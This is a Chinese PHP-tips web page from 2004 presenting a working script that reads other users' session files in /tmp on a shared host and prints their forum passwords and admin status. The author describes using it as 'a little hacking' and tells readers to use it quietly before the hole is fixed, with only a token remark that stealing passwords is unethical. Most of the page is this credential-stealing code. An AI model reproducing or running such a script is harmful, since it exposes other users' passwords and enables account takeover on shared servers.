您的位置:首页网页设计PHP技巧 → 一个查看session内容的函数

一个查看session内容的函数

时间:2004/11/7 3:19:00来源:本站整理作者:蓝点我要评论(0)

  之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:

  <?

  function submit1(){

  global $username;

  print "

  论坛

  ";

  $i=0;

  if($username=="tasm"||$username=="Tasm")

  {

  print "你也太黑了吧?连我你也查?";

  return;

  }

  $path="/tmp/";

  $d = dir($path);

  while($entry=$d->read()){

  if(substr($entry,0,4)=="sess"){

  $entry=$path.$entry;

  $ary=@file($entry);

  if(!empty($ary[0])){

  $ary = explode(";",$ary[0]);

  $name= explode(":",$ary[0]);

  if($name[2]=="\"".$username."\""){

  $passwd= explode(":",$ary[1]);

  $mode=explode(":",$ary[3]);

  print "用户笔名:".$name[2]."

  使用密码:".$passwd[2]."

  使用模式:";

  if($mode[1]==1)

  print "管理员";

  else

  print "一般用户";

  print"

  偷窃他人密码是不道德行为请少少为之

  ";

  $i=1;

  break;

  }}}}

  if(!$i)

  print "用户:".$username."真的在线吗?如你确定,请再来一次,不要多打空格!";

  $d->close();

  }

  function login(){

  ?>

  论坛

  论坛

  当你看到一用户在线时你想看他的密码,你要如何作呢?

  让我来告诉你:就是使用本程序。

  郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。

  不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。

  请输入你要查的用户名:

  <?

  }

  //--------------main()

  if($submit1)

  submit1();

  else

  login();

  ?>

相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 没有查询到任何记录。

最新文章 如何恢复Discuz!7.0被 CSS实现Tab技巧Linux配置DHCP服务器实例:linux配置教程如何在IIS7下设置支持PHP程序PHP技巧--通过COM使用ADODB

人气排行 dedecms数据库表和字段说明最小化数据传输——在客户端存储数据php如何自动跳转中英文页面如何在IIS7下设置支持PHP程序php批量获取首字母(汉字、数字、英文)经典php实现大文件上传源代码Windows环境PHP的session不能正常使用解决办PHP聊天室技术